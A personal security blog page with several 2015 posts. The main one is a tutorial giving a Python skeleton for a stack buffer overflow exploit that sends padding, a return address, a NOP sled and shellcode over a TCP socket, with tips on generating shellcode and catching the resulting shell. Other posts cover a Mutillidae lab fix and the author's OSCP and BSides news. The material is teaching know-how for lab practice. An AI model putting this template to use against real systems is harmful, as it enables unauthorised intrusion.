Thursday, March 12, 2015

Quick and Dirty Python Exploit Development

Ok, this post is about how to quickly code an exploit (read: Stack buffer overflow) in your favorite language and mine, Python.

Wait, it's not your FAVORITE language? Seriously?

Well, that's ok, we can still be friends.

This code assumes a couple things, namely:
1) You know a thing or two about Python
2) You understand how TCP/IP works
3) You understand what sockets are
4) You understand stack overflows
5) You have certain information from fuzzing, such as the address of ESP/EIP

If none of this makes sense to you, then head on over to https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ and discover a new world of exploit development!

Anyway, this will give you a simple outline in Python on how to code an exploit quickly, once you have that certain information you need that I mentioned above. I'll outline it, and then explain what each piece does after that.

Let's begin!

Code (without comments/explanation):

#!/usr/bin/python

import socket
import sys

retaddress = "<return address here>"

shellcode = "<shellcode here>"

buffer = "A" * <number here> + retaddress + "\x90" * 16 + shellcode 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try: 
server = sys.argv[1]
port = sys.argv[2]
except IndexError:
print "[!] Usage: %s <host> <port>" % sys.argv[0]
sys.exit()

try:
sock.connect((server, port))
print repr(sock.recv(1024))
sock.send(buffer)
print repr(sock.recv(1024))
except:
print "[!] Connection refused. Something went wrong..."

sock.close()

-------------------------------------------
Code (with comments/explanation): 

#!/usr/bin/python

# Import the "socket" library, necessary for any network functionality
# Import the "sys" library, necessary for accessing local system functionality

import socket
import sys

'''

"retaddress" is the return address where the shellcode will be located on the stack, i.e., ESP (Extended Stack Pointer)...
You're putting this address in at EIP (Extended Instruction Pointer).

In other words, you're overwriting EIP with the address you want the code to jump to. 
Remember that Intel x86 is Little Endian, so write the address backwards. For example, if your return address is AABBCCDD, put the address below as "\xDD\xCC\xBB\xAA"

'''

retaddress = <put an address here> 

'''
Shellcode goes here...if you're skilled enough to write your own, let's face it, you probably aren't reading this.

Use Metasploit's msfpayload/msfvenom to create shellcode, then make sure you have the appropriate listener setup to catch the shell, such as Metasploit's multi/handler or netcat/ncat.
'''

shellcode = <shellcode here>

'''
Setup the buffer that we'll send over the socket...

<number here> is the number of bytes that it takes to control EIP, then we put our shellcode after that...

Note that the NOP sled ("\x90" * 16) is optional, depending on how much room you have in the buffer...this will depend on the application
'''

buffer = "A" * <number here> + retaddress + "\x90" * 16 + shellcode 

# Now we'll setup the socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Make sure that the IP address and port number are put in
# If they aren't, then print the Usage, and exit

try: 
server = sys.argv[1]
port = sys.argv[2]
except IndexError:
print "[!] Usage: %s <host> <port>" % sys.argv[0]
sys.exit()
# Open the socket, send the exploit, go from there

try:
sock.connect((server, port))
print repr(sock.recv(1024))
sock.send(buffer)
print repr(sock.recv(1024))
except:
print "[!] Connection refused. Something went wrong..."

# Should be obvious here, close the socket connection
sock.close()


I hope this helped anyone trying to quickly code an exploit in Python...if you have questions or concerns, leave them in the comments.

Night everyone!
- Aaron

Wednesday, March 11, 2015

The Hackers OST still rocks...and other things.

Yeah, I said it. The Hackers soundtrack still rocks. I just found "Cowgirl" again while watching G0tmi1k's video on Tomcat exploitation. As I watched that video, I realized that Tomcat was indeed hackable. I hadn't played with it much before, but I'm definitely going to now.

There is a lot that I have learned that I don't know about MySQL and web app hacking, which brought me to G0tmi1k's video that I linked...and with that being said, I have decided that I will try to post little tidbits here and there about the process of learning Webapp hacking. So, with that being said, there may be long posts on here, or this could be a spot for me to place random info that I've picked up here and there. Enjoy!

-A

Friday, March 6, 2015

Mutillidae and Metasploitable2 errors

I found this just now over at http://colesec.inventedtheinternet.com/metasploitable-2-and-mutillidae/

If you're having issues with getting Mutillidae working on Metasploitable2 (let's face it, it's free and fast to setup and play with to get hacking away at something), then you'll notice that there are errors on some pages, specifically when you try to do any SQL injection. This is because the wrong database name is specified in the Mutillidae config file.

Here's the fix.

First, root the box. If you WANT to use Metasploit to do that, then do it. It's fun, and that's what it's there for. However, the easy way is to use "sudo su", put in the password, and then get to this directory: /var/www/mutillidae

config.inc Before
After that, find the config.inc file, and update the $dbname to "owasp10".



Yes, I use nano. I like it. So there.

Anyway, after updating, then you shouldn't have any issues getting Mutillidae to work in Metasploitable2.

For more information on Mutillidae, see Irongeek's site.
For more info on Metasploitable, see Rapid7's site.

For hacking away at Mutillidae, see webpwnized's Youtube channel. Great stuff there.

Stay classy!
Aaron

Moar blogging.

I realized a bit ago that I need to add more content. Really start sharing my thoughts...well, that's actually probably not a great idea.

Ahem.

Anyway, a couple quick notes. I passed the OSCP back in January. This was a great course, and I wish I could write reviews like so many others have done, but I'm not much of a writer, as you have probably seen from the lack of other posts on this blog. :-/

I will say that it challenged me in areas that I didn't know existed, and changed my whole thought process about how to attack a network, or, well, really anything.

I TRULY understand the meaning of Try Harder now.

Also, BSides Oklahoma is coming along nicely, a small group of us are working on getting it together, and it seems to be really pulling together. If you're interested, see our Wiki page, and SEND THOSE PAPERS! The CFP is now open, and entries are being reviewed as they come in.

I'm currently working on the t-shirts and stickers, so if they look awful, well, it's probably my fault. Heh. :-)

Anyway, as other stuff comes up, I'll be writing more. If any of you out there are actually reading this, and want to see something, ping me in the comments and let me know what you would like to see me write about. I'm not great at creativity, but I can try. Later.

-A